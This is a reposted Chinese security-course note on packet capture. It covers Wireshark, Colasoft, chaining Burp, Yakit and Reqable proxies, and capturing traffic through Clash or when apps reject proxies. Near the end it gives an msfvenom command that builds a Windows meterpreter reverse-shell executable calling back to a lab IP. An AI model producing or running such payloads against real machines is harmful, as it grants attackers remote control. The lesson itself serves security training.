自学内容网 自学内容网

2024小迪安全基础入门第七课

目录

一、抓包技术-Web&App&小程序&PC-扶墙双层

二、 抓包技术-Web&App&小程序&PC-项目联动

三、抓包技术-Web&App&小程序&PC-全局协议


一、抓包技术-Web&App&小程序&PC-扶墙双层

Wireshark:

https://www.wireshark.org/

网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

科来网络分析系统:

https://www.colasoft.com.cn/

该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

二、 抓包技术-Web&App&小程序&PC-项目联动

#抓包工具联动

意义:让一个数据包同时经过不同安全测试工具进行扫描

Burp->Yakit

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

Yakit->Burp

1、Yakit 127.0.0.1:8083

2、设置下游 127.0.0.1:8080

3、Burp 127.0.0.1:8080

4、系统的代理设置:127.0.0.1:8083

Burp->Yakit->Reqable

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

5、Yakit设置下游 127.0.0.1:9000

三、抓包技术-Web&App&小程序&PC-全局协议

#科学上网抓包

Clash+Burp Clash+Yakit

解决:

1、目标需要采用梯子才能访问

2、IP隐藏去访问并要进行抓包

#全局协议抓包

WireShark 科来网络系统

1、解决部分代理校验

有部分的app web 小程序 当设置了代理后无法抓包

校验:检测到了当前机器的代理设置 做了一个策略防止

做了代理的设置数据走向:本身应用-代理-还没有到网卡-给到监听抓包工具

没有做代理的数据走向:本身应用-服务器(网卡抓包) 代理是在网卡之前产生

2、APP/小程序/PC应用

由于应用类型不同,不是说所有的应用都有https协议的数据

3、蓝队分析TCP/UDP应用

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=6666 -f exe -o 9.exe


原文地址:https://blog.csdn.net/2401_86628519/article/details/144069014

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!